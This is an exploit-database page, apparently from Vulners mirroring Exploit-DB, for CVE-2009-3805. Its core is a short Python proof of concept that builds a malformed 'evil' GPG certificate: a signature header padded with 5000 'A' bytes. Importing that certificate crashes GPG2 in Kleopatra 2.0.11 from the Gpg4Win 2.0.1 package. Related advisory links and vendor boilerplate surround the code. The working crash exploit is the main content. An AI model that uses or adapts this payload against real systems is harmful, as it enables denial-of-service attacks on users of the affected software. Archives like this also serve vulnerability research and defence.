Lucene search
+L

GPG2/Kleopatra 2.0.11 - Malformed Certificate

🗓️ 21 Oct 2009 00:00:00Reported by Dr_IDEType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

GPG2/Kleopatra 2.0.11 Malformed Certificate Crash PoC part of GPG4Win Package v2.0.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3805
21 Oct 200900:00
circl
cve
CVE
CVE-2009-3805
27 Oct 200916:00
cve
cvelist
Cvelist
CVE-2009-3805
27 Oct 200916:00
cvelist
euvd
EUVD
EUVD-2009-3777
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10183 DoS vulnerability in Gpg4Win
23 Oct 200900:00
kaspersky
nvd
NVD
CVE-2009-3805
27 Oct 200916:30
nvd
openvas
OpenVAS
Gpg4Win Denial Of Service Vulnerability
2 Nov 200900:00
openvas
prion
Prion
Code injection
27 Oct 200916:30
prion
#!/usr/bin/env python

################################################################
#
# GPG2/Kleopatra 2.0.11 - Malformed Certificate Crash PoC
# Note: 	Part of the GPG4Win Package v2.0.1
# Found By:	Dr_IDE
# Tested On:	7RC, XPSP3
# Usage:	Import the Cert into Kleopatra, GPG2.exe Crashes
#
################################################################

# Seems to only check for the presense of this signature
cert  = ("\x99\x03\x2E\x04\x4A\xDC\xA8\x29\x11\x08\x20");
cert += ("\x41" * 5000);

try:
	print ("[*] Creating evil GPG cert.");
	f1 = open("gpg2_evil_cert.gpg","w");
	f1.write(cert);
	f1.close();
	print ("[*] File created successfully. Import it.");

except:
	print ("[-] Error.");

#[pocoftheday.blogspot.com]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Oct 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01374
41